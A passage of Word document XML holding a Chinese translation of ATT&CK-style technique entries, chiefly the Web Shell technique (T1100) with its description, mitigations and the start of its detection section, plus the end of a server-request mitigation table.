        <w:t>例如，攻击者可能会使服务器与自身或组织基础结构内的其他基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的服务或外部第三方系统建立连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECEFA8F" w14:textId="6F3C8104" w:rsidR="00FA7539" w:rsidRPr="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA7539" w:rsidRPr="005C4554" w14:paraId="3A43B2C6" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="02B9F78E" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRPr="005C4554" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="335AB7A3" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRPr="005C4554" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7539" w:rsidRPr="00671A0D" w14:paraId="204608F2" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="522E1624" w14:textId="12186515" w:rsidR="00FA7539" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于黑名单的输入过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D145678" w14:textId="727A5989" w:rsidR="00FA7539" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7539" w:rsidP="00FA7539">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序可以阻止包含主机名（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>localhost</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）或敏感</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/ admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）的输入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7539" w:rsidRPr="00671A0D" w14:paraId="217B7862" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39D1ED1A" w14:textId="5976A38C" w:rsidR="00FA7539" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7539" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于白名单的输入过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4581D955" w14:textId="376D15E4" w:rsidR="00FA7539" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7539" w:rsidP="00FA7539">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序只允许与允许值的白名单匹配，开头或包含的输入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B2C2303" w14:textId="77777777" w:rsidR="00FA7539" w:rsidRDefault="00FA7539" w:rsidP="00FA7539"/>
    <w:p w14:paraId="1B96526C" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令执行环境</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A640F" w:rsidRPr="00671A0D" w14:paraId="396D2D26" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70E4B39A" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CB07E5" w14:textId="360E87CC" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始</w:t>
            </w:r>
            <w:r>
              <w:t>访问，持久</w:t>
            </w:r>
            <w:r w:rsidR="00B438B1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57FA93DD" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43075D8D" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者通过漏洞或账号访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>eb</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器，上传和提供</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">eb </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9CC304" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F22D4B" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，认证日志，文件监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C082F8" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C69E877" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7607F904" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本，放置在可公开访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器上。攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器用作网关。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在承载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的系统上提供一组待执行的函数或命令行界面。除了服务器端脚本之外，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能还有一个客户端接口程序，用于与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器通信（例如，参见</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>China Chopper Web shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8FBDA" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者的主要访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>被发现并移除，攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为冗余访问或持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712952A" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A640F" w:rsidRPr="00EF1D67" w14:paraId="56CBB43C" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2EF1443A" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00EF1D67" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1D67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="78D321FC" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00EF1D67" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1D67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A640F" w:rsidRPr="00671A0D" w14:paraId="6E35AD7C" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCE4D05" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidR="003A640F" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="086D8FE3" w14:textId="299C8635" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>审核账号和组权限，确保用于管理服务器的账号与内部网络中具有以下</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>特征的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户账号和权限不重叠：账号和权限可以通过</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取，用于登录到</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>eb</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器并构建</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>web shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或者</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>从</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>服务器进入内部</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A640F" w:rsidRPr="00671A0D" w14:paraId="0B8B8134" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="632"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C4D6CD4" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidR="003A640F" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>软件升级</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6154C161" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保定期对面向外部的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>eb</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器打补丁，防止攻击者利用权限升级获取远程代码访问权限或利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>包含</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>缺陷</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上传文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>或脚本</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用作</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>网页</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01E86F00" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF714F0" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB0F09" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很难检测到。与其他形式的持久远程访问不同，它们不会发起连接。服务器上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
